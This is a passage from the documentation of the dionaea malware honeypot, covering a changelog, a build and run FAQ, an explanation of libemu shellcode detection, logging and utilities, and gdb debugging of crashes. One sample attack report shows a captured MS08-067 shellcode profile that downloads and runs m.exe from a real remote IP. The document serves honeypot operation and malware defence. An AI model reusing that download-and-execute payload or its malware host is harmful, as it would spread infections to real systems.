1981 • Catch exceptions in incident handlers
1982
1983 python/sip
1984
1985 • Fix error while reading config values
1986
1987 python/upnp
1988
1989 • Fix errors in log messages
1990
1991 more
1992
1993 • Add templates to create issues and merge requests on github
1994
1995 0.4.1 - 2016-06-14
1996 core
1997
1998 • Initialize stdout logger earlier
1999
2000 • Log error,critical and warning by default
2001
2002 python/*
2003
2004 • In glib2 critical is a critical warning
2005
2006 • Add support for exceptions
2007
2008 • Check file path and show warnings
2009
2010 python/log_json
2011
2012 • Add support for flat object lists to work with ELK stack
2013
2014 0.4.0 - 2016-05-31
2015 core
2016
2017 • Replace lcfg with Key-value file parser from glib
2018
2019 ci
2020
2021 • Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8
2022
2023 doc
2024
2025 • Add initial documentation for missing modules
2026
2027 • Update documentation to reflect config changes
2028
2029 • Add processor documentation
2030
2031 python/*
2032
2033 • Replace lcfg with yaml configs
2034
2035 • Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
2036
2037 • Rename incident handlers from logsql to log_sqlite
2038
2039 • Rename incident handlers from uniqdownload to submit_http_post
2040
2041 python/mysql
2042
2043 • Enable processor pipeline
2044
2045 0.3.0 - 2016-03-30
2046 core
2047
2048 • Code clean up (Thanks to Katarina)
2049
2050 • Vagrant based dev environment
2051
2052 • Customize ssl/tls parameters for autogenerated certificates
2053
2054 doc
2055
2056 • Initial version of sphinx based documentation
2057
2058 python/ftp
2059
2060 • Support to customize response messages
2061
2062 • Small fixes
2063
2064 python/hpfeeds
2065
2066 • Initial ihandler support (Thanks to rep)
2067
2068 python/http
2069
2070 • Customize HTTP response headers
2071
2072 • Return HTTP/1.1 instead of HTTP/1.0
2073
2074 python/log_json
2075
2076 • Initial ihandler support
2077
2078 python/mqtt
2079
2080 • Initial protocol support (Thanks to gento)
2081
2082 python/pptp
2083
2084 • Initial protocol support (Thanks to gento)
2085
2086 python/upnp
2087
2088 • Initial protocol support (Thanks to gento)
2089
2090 0.2.1 - 2014-07-16
2091 core
2092
2093 • Support for cython and cython3
2094
2095 • Fixes to build with glib 2.40
2096
2097 • Remove build warnings
2098
2099 • Support libnl >= 3.2.21
2100
2101 python/http
2102
2103 • Fix unlink() calls
2104
2105 python/virustotal
2106
2107 • virustotal API v2.0
2108
2109 0.2.0 - 2013-11-02
2110 Last commit by original authors.
2111
2112 0.1.0
2113 • Initial release.
2114
2116 WARNING:
2117 The documentation is work in progress.
2118
2119 Build/Install
2120 I get gcc: command not found?
2121 install gcc..
2122
2123 How to uninstall it?
2124 rm -rf /opt/dionaea
2125
2126 I get binding.pyx:…: undeclared name not builtin: bytes during the
2127 python modules build.
2128 Install a recent cython version
2129
2130 I get Python.h not found during compiling cython
2131 Install appropriate headers for your python interpreter
2132
2133 I do not use ubuntu/debian and the instructions are useless for me
2134 therefore.
2135 I use debian/ubuntu, and therefore I can only provide instructions
2136 for debian/ubuntu, but you are free to send me a diff for your
2137 operating system.
2138
2139 I use Redhat/Centos 5 and the installation is frustrating and a mess as
2140 nothing works.
2141 That’s right, but I did not choose your operating system. Here is a
2142 list of outdated or missing packages for your chosen distribution:
2143 all. Yes, you’ll even have to install glib (you’ll have 2.10 where
2144 2.20 is required) from source. Getting python3 compiled with a
2145 recent sqlite3 version installed to /opt/dionaea requires editing the
2146 setup.py file (patch <http://p.carnivore.it/KDIFWt>). /I experienced
2147 this wonderful operating system myself … You really have to love
2148 your distro to stick with it, even if it ships software versions
2149 your grandma saw released in her youth. Centos is the best distro …
2150 to change distros. No matter what you choose, it can’t get worse./
2152
2153 Unable to build.
2154
2155 ==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
2156 ==> default: cp:
2157 ==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory
2158
2159 ==> default: libtool: Version mismatch error. This is libtool 2.4.6 Debian-2.4.6-2, but the
2160 ==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
2161 ==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
2162 ==> default: libtool: and run autoconf again.
2163
Try to clean your build environment.

WARNING:
This will remove all ignored and untracked files from the directory.
Run it with --dry-run first to see what would be deleted.

git clean -xdf
2171
2172 Run
2173 I get OperationalError at unable to open database file when using
2174 logsqlite and it does not work at all
2175 Read the logsql instructions <#logsql>
2176
2177 I get a Segmentation Fault
2178 Read the segfault instructions <#segfault>
2179
2180 I logrotate, and after logrotate dionaea does not log anymore.
2181 Read the logrotate instructions <#logging>
2182
p0f does not work.
Make sure you have p0f 2.0.8 and dionaea does not listen on ::, as p0f
can’t deal with IPv6.
2186
I’m facing a bug, it fails, and I can’t figure out why.
Explain the problem. If I’m interested in the nature of the problem,
as it does not sound like pebcak, I may ask for a shell/screen and
have a look myself, and if it is worth it, you’ll even get a FAQ entry
for some specialties of your OS.
2192
Unable to bind to port after dropping privileges
Dropping privileges and binding to ports lower than 1024 is only
supported on Linux systems. If some of the optional build
dependencies are missing, dionaea might not be able to bind to these
ports either. After enabling all log levels it should display log
messages like in the example below.
2199
2200 [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2201 [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2202 [10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
2203
2204 To fix this issue you have to install the kernel headers for your
2205 kernel and rebuild dionaea. If everything works as it should you
2206 might get log messages like in the example below. You might have
2207 noticed that there is now a pchild section. This means dionaea is
2208 using a child process with extended privileges to bind to the port.
2209
2210 [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2211 [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2212 [10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
2213 [10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
2214 [10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
2215
2217 WARNING:
2218 The documentation is work in progress.
2219
Rotate bistream files
Dionaea does not have, and may never have, a function/option to rotate
the bistream files. But you can do this with a cron job and a simple
shell script.
2224
2225 Feel free to use and modify the script below.
2226
#!/bin/bash

# Compress bistream files older than 2 days (skip files already gzipped).
# Walking the directory with -mindepth 1 instead of a shell glob avoids
# an error when the bistreams directory is empty.
find /var/lib/dionaea/bistreams -mindepth 1 -type f -mtime +2 ! -name '*.gz' -exec gzip {} \;

# Clear bistream logs from dionaea every week, then drop empty per-day directories
find /var/lib/dionaea/bistreams -mindepth 1 -type f -mtime +7 -exec rm {} \;
find /var/lib/dionaea/bistreams -mindepth 1 -type d -empty -delete
2235
2237 Cui honorem, honorem
2238 Google:
2239 Google has supported 3 students to work on dionaea during GSoc 2009,
2240 GSoc 2010 and GSoc 2011.
2241
SURFnet:
SURFnet has supported the project in the past (2010?-2014?). Working
with SURFnet is a real pleasure.
2245
2246 Support
If you are getting frustrated because things do not work for you and
you already read the FAQ, join the mailing list and share your
experience, or the chat.
2250
2251 GitHub
2252 Use the issue tracker to report any problem.
2253
2254 Website: Issue tracker
2255
2256 IRC
2257 From time to time some of the developers join the #nepenthes channel
2258 on freenode. irc://irc.freenode.org/nepenthes
2259
2260 Mailing List:
2261 Only a few messages every year. Seems to be dead, no message since
2262 2015.
2263
2264 Website: Mailinglist nepenthes-devel
2265
2266 Links
2267 • GSoC 2009 Project #10 http://honeynet.org/gsoc/project10
2268
2269 • The Honeynet Project
2270
2271 Old documentation:
2272
Attackers do not seek your service, attackers want to exploit you;
they’ll chat with the service for some packets, and afterwards send a
payload. dionaea has to detect and evaluate the payload to be able to
gain a copy of the malware. In order to do so, dionaea uses libemu.
2278
Given certain circumstances, libemu can detect shellcode, measure the
shellcode, and if required even execute the shellcode. Shellcode
detection is done by making use of GetPC heuristics; others wrote
papers about it, we decided to write libemu to do so. This detection is
rather time consuming, and therefore done using threads.
2284
The part of dionaea which takes care of the network io can create a
copy of all input/output of a connection; this copy is passed to the
detection facility, which is a tree of detection facilities. At this
moment there is only a single leaf, the emu plugin. The emu plugin uses
threads and libemu to detect and profile/measure shellcode.
2290
Shellcode measurement/profiling is done by running the shellcode in the
libemu vm and recording API calls and arguments. For most shellcode
profiling is sufficient: the recorded API calls and arguments reveal
enough information to get an idea of the attacker’s intention and act
upon it. For multi-stage shellcode, where the first exploitation stage
of the shellcode would retrieve a second shellcode from the attacker,
profiling is not sufficient, as we lack the information ‘what to do’
from the second stage of the shellcode; in this case we need to make
use of shellcode execution. Shellcode execution is basically the same
as shellcode profiling, the only difference being that the api calls
are not recorded, and we allow the shellcode to take certain actions,
for example creating a network connection.
2303
2304 Payloads
Once we have the payload, and the profile, dionaea has to guess the
intention, and act upon it.
2307
Shells - bind/connectback
This payload offers a shell (cmd.exe prompt) to the attacker, either by
binding a port and waiting for the attacker to connect to us again, or
by connecting to the attacker. In both cases, dionaea offers a cmd.exe
emulation to the attacker, parses the input, and acts upon the input;
usually the instructions download a file via ftp or tftp.
2314
URLDownloadToFile
These shellcodes use the URLDownloadToFile api call to retrieve a file
via http, and execute the retrieved file afterwards.

Exec
Making use of WinExec, these shellcodes execute a single command which
has to be parsed and processed like the bind/connectback shell
commands.

Multi Stage Payloads
We never know what the second stage is, therefore libemu is used to
execute the shellcode in the libemu vm.
2327
Once dionaea has gained from the shellcode the location of the file the
attacker wants it to download, dionaea will try to download the file.
The protocol to download files via tftp and ftp is implemented in
python (ftp.py and tftp.py) as part of dionaea; downloading files via
http is done in the curl module, which makes use of libcurl’s awesome
http capabilities. Of course libcurl can run downloads for ftp too, but
the ftp services embedded in malware are designed to work with the
windows ftp.exe client, and fail for others.
2337
Once dionaea got a copy of the worm attacking her, we may want to store
the file locally for further analysis, or submit the file to some 3rd
party for further analysis.

dionaea can http/POST the file to several services like CWSandbox,
Norman Sandbox or VirusTotal.
2345
If you want to change the software, it is really important to
understand how it works, therefore please take the time to read how it
works. dionaea.conf is the main configuration file; the file consists
of sections for:
2351
2352 • logging
2353
2354 • processors
2355
2356 • downloads
2357
2358 • bistreams
2359
2360 • submit
2361
2362 • listen
2363
2364 • modules
2365
2366 logging
2367 The logging section controls … logging, you can specify log domains and
2368 loglevel for different logfiles. As dionaea is pretty … verbose, it is
2369 useful to rotate the logfiles using logrotate.
2370
2371 # logrotate requires dionaea to be started with a pidfile
2372 # in this case -p /opt/dionaea/var/run/dionaea.pid
2373 # adjust the path to your needs
2374 /opt/dionaea/var/log/dionaea*.log {
2375 notifempty
2376 missingok
2377 rotate 28
2378 daily
2379 delaycompress
2380 compress
2381 create 660 root root
2382 dateext
2383 postrotate
2384 kill -HUP `cat /opt/dionaea/var/run/dionaea.pid`
2385 endscript
2386 }
2387
Place this file at /etc/logrotate.d/dionaea.
2389
modules
downloads specifies where to store downloaded malware. bistreams
specifies where to store bi-directional streams; these are pretty
useful when debugging, as they allow you to replay an attack on
ip-level, without messing with pcap&tcpreplay, which never worked for
me. submit specifies where to send files to via http or ftp; you can
define a new section within submit if you want to add your own
service. listen sets the addresses dionaea will listen to. The default
is all addresses it can find, this mode is called getifaddrs, but you
can set it to manual and specify a single address if you want to limit
it. modules is the most powerful section, as it specifies the modules
to load, and the options for each module.
2402
2403 logsql
2404 This section controls the logging to the sqlite database. logsql does
2405 not work when chrooting - python makes the path absolute and fails for
2406 requests after chroot().
2407
logsql requires the directory where the logsql.sqlite file resides to
be writable by the user, as well as the logsql.sqlite file itself.
So, if you drop user privs, make sure the user you drop to is allowed
to read/write the file and the directory.
2412
2413 chown MYUSER:MYGROUP /var/lib/dionaea -R
2414
To query the logsql database, I recommend looking at the
readlogsqltree.py <#readlogsqltree> script; for visualisation, the
gnuplotsql <#gnuplotsql> script.
2418
2419 The blog on logsql:
2420
2421 • 2009-11-06 dionaea sql logging
2422
2423 • 2009-12-08 post it yourself
2424
2425 • 2009-12-12 sqlite performance
2426
2427 • 2009-12-14 virustotal fun
2428
2429 • 2009-12-15 paris mission pack avs
2430
2431 • 2010-06-06 data visualisation
2432
2433 logxmpp
This section controls the logging to xmpp services. If you want to use
logxmpp, make sure to enable logxmpp in the ihandler section. Using
logxmpp allows you to share your newly collected files with other
sensors anonymously.
2438
2439 The blog on logxmpp:
2440
2441 • 2010-02-10 xmpp backend
2442
2443 • 2010-05-12 xmpp take #2
2444
2445 • 2010-05-15 xmpp take #3
2446
pg_backend <#pg_backend> can be used as a backend for xmpp logging
sensors.
2449
p0f
Not enabled by default, but recommended: the p0f service. Enable it by
uncommenting p0f in the ihandlers section of the python modules
section, and start p0f as suggested in the config. It costs nothing,
and gives some pretty cool, even if outdated, information about the
attacker’s operating system, and you can look it up from the sqlite
database, even for the rejected connections. If you face problems,
here are some hints.
2458
2459 ihandlers
ihandlers section is used to specify which ihandlers get started by
ihandlers.py. You do not want to miss p0f and logsql.

services
services controls which services will get started by services.py.
2465
Dionaea ships with some utils. As these utils are written in python and
rely on the python3 interpreter dionaea requires to operate, this
software can be found in modules/python/utils:
2470
2471 readlogsqltree <#readlogsqltree> -
2472 modules/python/readlogsqltree.py
2473
readlogsqltree is a python3 script which queries the logsql sqlite
database for attacks, and prints out all related information for every
attack. This is an example of an attack; you get the vulnerability
exploited, the time, the attacker, information about the shellcode, the
file offered for download, and even the virustotal report for the file:
2479
2480 2010-10-07 20:37:27
2481 connection 483256 smbd tcp accept 10.0.1.11:445 <- 93.177.176.190:47650 (483256 None)
2482 dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2483 dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2484 dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2485 dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2486 dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2487 dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2488 dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2489 dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2490 dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2491 dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2492 dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2493 dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2494 profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.158/m.exe', '60.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['60.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
2495 offer: http://208.53.183.158/m.exe
2496 download: 3eab379ddac7d80d3e38399fd273ddd4 http://208.53.183.158/m.exe
2497 virustotal 2010-10-07 04:59:07 5/38 (13%) http://www.virustotal.com/file-scan/report.html?id=265e39edcba9d9004451601544e625f2d3d04f837d0aaf1f8464cb2c819c1939-1286420347
2498 names 'High Risk Fraudulent Security Program' 'Suspicious file' 'Trojan.DownLoader1.27100' 'Worm.Win32.Rimecud' 'Worm:Win32/Rimecud.B'
2499
To create such a report of your own honeypot’s activities for the last
24 hours run:
2502
2503 ./readlogsqltree.py -t $(date '+%s')-24*3600 /var/lib/dionaea/logsql.sqlite
2504
2505
2506 gnuplotsql <#gnuplotsql> - modules/python/gnuplotsql.py
2507
gnuplotsql is a very slow python3 script which runs some queries on the
logsql <#logsql> sqlite database and creates graphs with gnuplot of the
data, stores them on disk and creates an index of the data. The images
are per protocol and look like this: Overview for dionaea smbd. Here
<gnuplotsql> is how the whole thing looks. To create such images of
your own data, run:
2514
2515 ./gnuplotsql.py -d /var/lib/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd
2516
2517 The blog got something on gnuplotsql as well:
2518
2519 • 2010-12-05 sudden death
2520
2521 • 2010-10-01 Infosanity’s Blog: gnuplotsql.py
2522
2523 • 2010-09-19 gnuplotsql
2524
2525 pg_backend <#pg_backend> - modules/python/xmpp/pg_backend.py
2526
2527 pg_backend is the backend for logxmpp <#logxmpp>, currently it is a
2528 python2.x script which uses pyxmpp to access the xmpp service. It
2529 parses the messages received and can store the events in a postgres
2530 database and the received files on disk. pg_backend requires an xmpp
2531 account:
2532
Without db:

./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -f /tmp/

With db, first create the database:

psql ...

then start the backend:

./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/
2544
2546 In case you experience a segfault, you will see something like this:
2547
This is the end. This software just had a segmentation fault. The bug
you encountered may even be exploitable. If you want to assist in
fixing the bug, please send the backtrace below to nepenthesdev@gmail.com.
You can create better backtraces with gdb, for more information visit
http://dionaea.carnivore.it/#segfault Once you read this message, your
tty may be broken, simply type reset, so it will come to life again:
2554
2555 /opt/dionaea/bin/dionaea(sigsegv_backtrace_cb+0x20)[0x805c11e]
2556 [0x70d420]
2557 /opt/dionaea/lib/libemu/libemu.so.2(emu_env_w32_eip_check+0x94)[0x186974]
2558 /opt/dionaea/lib/dionaea/emu.so(run+0x39)[0x89cced]
2559 /opt/dionaea/lib/dionaea/emu.so(profile+0xbb)[0x89db88]
2560 /opt/dionaea/lib/dionaea/emu.so(proc_emu_on_io_in+0x1e1)[0x89bfc5]
2561 /opt/dionaea/bin/dionaea(recurse_io_process+0x31)[0x805df4a]
2562 /opt/dionaea/bin/dionaea(processors_io_in_thread+0x85)[0x805e08d]
2563 /opt/dionaea/bin/dionaea(threadpool_wrapper+0x2e)[0x805c99a]
2564 /opt/dionaea/lib/libglib-2.0.so.0[0xaa9498]
2565 /opt/dionaea/lib/libglib-2.0.so.0[0xaa7a2f]
2566 /lib/libpthread.so.0[0xd8973b]
2567 /lib/libc.so.6(clone+0x5e)[0x2b3cfe]
2568
While the backtrace itself gives an idea what might be wrong, it does
not fix the problem. To fix the problem, the logfiles usually help, as
dionaea is very verbose by default. Below are some hints on how to get
started with debugging; click here <#support> for assistance.
2573
2574 debugging
2575
2577 Valgrind does a great job, here is how I use it:
2578
2579 valgrind -v --leak-check=full --leak-resolution=high --show-reachable=yes \
2580 --log-file=dionaea-debug.log /opt/dionaea/bin/dionaea --my-dionaea-options
2581
2582
2583 gdb
2584
2585
2586 logfile assisted
2587
For the above example, I was able to scrape the shellcode from the
logfile, and run it in libemu, without involving dionaea at all,
reducing the problem:
2591
2592 gdb /opt/dionaea/bin/sctest
2593 (gdb) run -S -s 10000000 -g < sc.bin
2594 Starting program: /media/sda4/opt64/dionaea/bin/sctest -S -s 10000000 -g < sc.bin
2595
2596 Once it crashed, I retrieved a full backtrace:
2597
2598 Program received signal SIGSEGV, Segmentation fault.
2599 env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2600 545 struct emu_env_hook *hook = (struct emu_env_hook *)ehi->value;
2601
2602 (gdb) bt full
2603 #0 env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2604 dll = 0x6366f0
2605 ehi = <value optimized out>
2606 hook = <value optimized out>
2607 c = 0x611180
2608 mem = <value optimized out>
2609 eip_save = <value optimized out>
2610 module = 2088763392
2611 p_procname = 4289925
2612 procname = <value optimized out>
2613 #1 0x00007ffff7b884fb in emu_env_w32_eip_check (env=0x629a30) at environment/win32/emu_env_w32.c:306
2614 dll = <value optimized out>
2615 ehi = <value optimized out>
2616 hook = 0x64c5b0
2617 eip = <value optimized out>
2618 #2 0x0000000000403995 in test (e=0x60f0e0) at sctestmain.c:277
2619 hook = 0xe2
2620 ev = 0x0
2621 iv = <value optimized out>
2622 cpu = 0x611180
2623 mem = <value optimized out>
2624 env = 0x629a30
2625 na = <value optimized out>
2626 j = 7169
2627 last_vertex = 0x0
2628 graph = 0x0
2629 eh = 0x0
2630 ehi = 0x0
2631 ret = <value optimized out>
2632 eipsave = 2088807840
2633 #3 0x00000000004044e4 in main (argc=5, argv=0x7fffffffe388) at sctestmain.c:971
2634 e = <value optimized out>
2635
In this case, the problem was a bug in libemu.

gdb dump memory
2638
2639 Once again, it broke, and we got a backtrace:
2640
2641 #0 0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
2642 eqi = (struct emu_queue_item *) 0x0
2643 #1 0xb70b15d1 in emu_shellcode_run_and_track (e=0xb4109cd0, data=0xb411c698 "", datasize=<value optimized out>, eipoffset=<value optimized out>,
2644 steps=256, etas=0xb410cd60, known_positions=0xb3d7a810, stats_tested_positions_list=0xb3da3bf0, brute_force=true) at emu_shellcode.c:408
2645 current_pos_ti_diff = (struct emu_tracking_info *) 0x88c3c88
2646 current_pos_ht = <value optimized out>
2647 current_pos_v = <value optimized out>
2648 current_pos_satii = (struct emu_source_and_track_instr_info *) 0xb407e7f8
2649 bfs_queue = (struct emu_queue *) 0xb3e17668
2650 ret = 4662443
2651 eipsave = <value optimized out>
2652 hook = <value optimized out>
2653 j = 4
2654 es = <value optimized out>
2655 eli = (struct emu_list_item *) 0xb3e17658
2656 cpu = (struct emu_cpu *) 0xb4109ab0
2657 mem = (struct emu_memory *) 0xb410c3a0
2658 eq = (struct emu_queue *) 0xb3da0918
2659 env = (struct emu_env *) 0xb3e10208
2660 eli = (struct emu_list_item *) 0x4724ab
2661 #2 0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
2662 es = (struct emu_stats *) 0xb3d92b28
2663 new_results = (struct emu_list_root *) 0xb3da3bf0
2664 offset = <value optimized out>
2665 el = (struct emu_list_root *) 0xb4100510
2666 etas = (struct emu_track_and_source *) 0xb410cd60
2667 eh = (struct emu_hashtable *) 0xb3d7a810
2668 eli = (struct emu_list_item *) 0xb3d92b40
2669 results = (struct emu_list_root *) 0xb3d82850
2670 es = <value optimized out>
2671 __PRETTY_FUNCTION__ = "emu_shellcode_test"
2672 #3 0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
2673 e = (struct emu *) 0xb4109cd0
2674 ctx = (struct emu_ctx *) 0x87a2400
2675 offset = 14356
2676 streamdata = (void *) 0xb411c698
2677 size = 8196
2678 ret = 0
2679 __PRETTY_FUNCTION__ = "proc_emu_on_io_in"
2680 #4 0x0805e8be in recurse_io_process (pd=0x87dc388, con=0x8864b58, dir=bistream_in) at processor.c:167
2681 No locals.
2682 #5 0x0805ea01 in processors_io_in_thread (data=0x8864b58, userdata=0x87dc388) at processor.c:197
2683 con = (struct connection *) 0x8864b58
2684 pd = (struct processor_data *) 0x87dc388
2685 __PRETTY_FUNCTION__ = "processors_io_in_thread"
2686 #6 0x0805d2da in threadpool_wrapper (data=0x87d7bd0, user_data=0x0) at threads.c:49
2687 t = (struct thread *) 0x87d7bd0
2688 timer = (GTimer *) 0xb4108540
2689 #7 0xb77441f6 in g_thread_pool_thread_proxy (data=0x83db460) at gthreadpool.c:265
2690 task = (gpointer) 0x87d7bd0
2691 pool = (GRealThreadPool *) 0x83db460
2692 #8 0xb7742b8f in g_thread_create_proxy (data=0x83dc7d0) at gthread.c:635
2693 __PRETTY_FUNCTION__ = "g_thread_create_proxy"
2694 #9 0xb76744c0 in start_thread () from /lib/i686/cmov/libpthread.so.0
2695 No symbol table info available.
2696 #10 0xb75f36de in clone () from /lib/i686/cmov/libc.so.6
2697 No symbol table info available.
2698
Again, it was a bug in libemu: an endless loop consuming all memory.
To reproduce, we have to dump the tested buffer, therefore we need the
buffer’s address and size. Luckily the size is noted in frame #2 as
8196 and the data address is a parameter which was not optimized out
for frame #2:
2704
2705 dump binary memory /tmp/sc.bin 0xb411c698 0xb411e89c
2706
2707 Afterwards, debugging libemu by feeding the data into sctest is easy.
2708
2709 I’ve had fun with objgraph and gdb debugging reference count leaks in
2710 python too, here <http://carnivore.it/2009/12/23/arcane_bugs> is the
2711 writeup:
2712
2713 gdb python3 embedded
2714
2715 Sometimes, there is something wrong with the python scripts, but gdb
2716 does not provide any useful output:
2717
2718 bt full
2719 #12 0xb765f12d in PyEval_EvalFrameEx (f=0x825998c, throwflag=0) at Python/ceval.c:2267
2720 stack_pointer = (PyObject **) 0x8259af0
2721 next_instr = (unsigned char *) 0x812fabf "m'"
2722 opcode = 100
2723 oparg = <value optimized out>
2724 why = 3071731824
2725 err = 1
2726 x = (PyObject *) 0xb7244aac
2727 v = <value optimized out>
2728 w = (PyObject *) 0xadb5e4dc
2729 u = (PyObject *) 0xb775ccb0
2730 freevars = (PyObject **) 0x8259af0
2731 retval = (PyObject *) 0x0
2732 tstate = (PyThreadState *) 0x809aab0
2733 co = (PyCodeObject *) 0xb717b800
2734 instr_ub = -1
2735 instr_lb = 0
2736 instr_prev = -1
2737 first_instr = (unsigned char *) 0x812f918 "t"
2738 names = (PyObject *) 0xb723f50c
2739 consts = (PyObject *) 0xb71c9f7c
2740 opcode_targets = {0xb765d202, 0xb765f60a, 0xb766133a, 0xb76612db, 0xb7661285, 0xb7661222, 0xb765d202, 0xb765d202, 0xb765d202, 0xb76611dd,
2741 0xb766114b, 0xb76610b9, 0xb766100f, 0xb765d202, 0xb765d202, 0xb7660f7d, 0xb765d202, 0xb765d202, 0xb765d202, 0xb7660eb7, 0xb7660dfb, 0xb765d202,
2742 0xb7660d30, 0xb7660c65, 0xb7660ba9, 0xb7660aed, 0xb7660a31, 0xb7660975, 0xb76608b9, 0xb76607fd, 0xb765d202 <repeats 24 times>, 0xb7660736, 0xb766066b,
2743 0xb76605af, 0xb76604f3, 0xb765d202, 0xb7660437, 0xb766035d, 0xb76602ad, 0xb7661aba, 0xb76619fe, 0xb7661942, 0xb7661886, 0xb7661b76, 0xb76614a8,
2744 0xb7661413, 0xb766138e, 0xb766171f, 0xb76616e6, 0xb765d202, 0xb765d202, 0xb765d202, 0xb766162a, 0xb766156e, 0xb76601f1, 0xb7660135, 0xb76617ca,
2745 0xb7660120, 0xb765fff7, 0xb765d202, 0xb765fd72, 0xb765fc6e, 0xb765d202, 0xb765fc1d, 0xb765fe17, 0xb765fd90, 0xb765fec0, 0xb765fb41, 0xb765fadc,
2746 0xb765f9ed, 0xb765f94d, 0xb765f8be, 0xb765f7e3, 0xb765f779, 0xb765f6bd, 0xb765f66c, 0xb765ef1d, 0xb765eea2, 0xb765ede1, 0xb765ed1a, 0xb765ec35,
2747 0xb765ebc3, 0xb765eb30, 0xb765ea69, 0xb765f1c7, 0xb765f027, 0xb765f560, 0xb765efc1, 0xb76630e3, 0xb766310c, 0xb765e64c, 0xb765e592, 0xb765f49a,
2748 0xb765f3de, 0xb765d202, 0xb765d202, 0xb765f39e, 0xb7663135, 0xb766315f, 0xb765e9cb, 0xb765d202, 0xb765e948, 0xb765e8bb, 0xb765e817, 0xb765d202,
2749 0xb765d202, 0xb765d202, 0xb765d2ae, 0xb765e3e0, 0xb7663275, 0xb765e1a2, 0xb766324e, 0xb765e0ba, 0xb765e01e, 0xb765df74, 0xb765d202, 0xb765d202,
2750 0xb7663189, 0xb76631d3, 0xb7663220, 0xb765e149, 0xb765d202, 0xb765de09, 0xb765dec0, 0xb765f2c0, 0xb765d202 <repeats 108 times>}
2751 #13 0xb7664ac0 in PyEval_EvalCodeEx (co=0xb717b800, globals=0xb7160b54, locals=0x0, args=0x84babb8, argcount=9, kws=0x0, kwcount=0, defs=0xb719e978,
2752 defcount=1, kwdefs=0x0, closure=0x0) at Python/ceval.c:3198
2753 f = (PyFrameObject *) 0x825998c
2754 retval = <value optimized out>
2755 freevars = (PyObject **) 0x8259af0
2756 tstate = (PyThreadState *) 0x809aab0
2757 x = <value optimized out>
2758 u = <value optimized out>
2759
Luckily python3 ships with some gdb macros, which assist in dealing
with this mess. You can grab them over here
<http://svn.python.org/view/python/tags/r311/Misc/gdbinit?view=markup>
and place them in ~/.gdbinit, where ~ is the home directory of the user
dionaea runs as. If you get “warning: not using untrusted file
"/home/user/.gdbinit"” you are running gdb via sudo, and the file
/home/user/.gdbinit has to be owned by root. If you are running as
root, and you get “Program received signal SIGTTOU, Stopped (tty
output).”, run stty -nostop before running gdb, reattach the process
with fg, close gdb properly, and start over.
2770
Once you got the macros loaded properly at gdb startup, set a
breakpoint on PyEval_EvalFrameEx after dionaea loaded everything:
2773
2774 break PyEval_EvalFrameEx
2775
2776 Then we have some useful macros for gdb:
2777
2778 up
2779 pyframev
2780
2781 pyframev combines the output of pyframe and pylocals.
2782
2783 Be aware you can segfault dionaea now from within gdb, going up, out of
